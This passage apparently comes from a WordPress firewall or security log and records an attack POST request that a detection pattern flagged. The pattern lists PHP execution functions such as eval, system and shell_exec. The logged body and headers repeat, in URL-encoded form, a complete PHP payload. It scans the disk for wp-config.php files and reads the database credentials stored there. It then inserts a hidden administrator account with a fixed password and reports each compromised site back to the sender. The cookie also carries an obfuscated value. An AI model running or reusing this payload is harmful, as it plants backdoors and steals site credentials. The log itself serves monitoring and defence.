27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 12:10:29","213.209.159.254","POST","\/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/119.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Dk:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php HTTP\/1.1\ncookie:4=e367ba33cbb513d4c0b57eb3026dd8cc; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvETfvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaIwo252MKW0VwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nhost:dewenlabels.com\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/119.0.0.0 Safari\/537.36\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\"Google Chrome\";v=\"119\", \"Chromium\";v=\"119\", \"Not?A_Brand\";v=\"24\"\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"macOS\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-site:none\ncontent-length:12640\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\n\nDk=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%2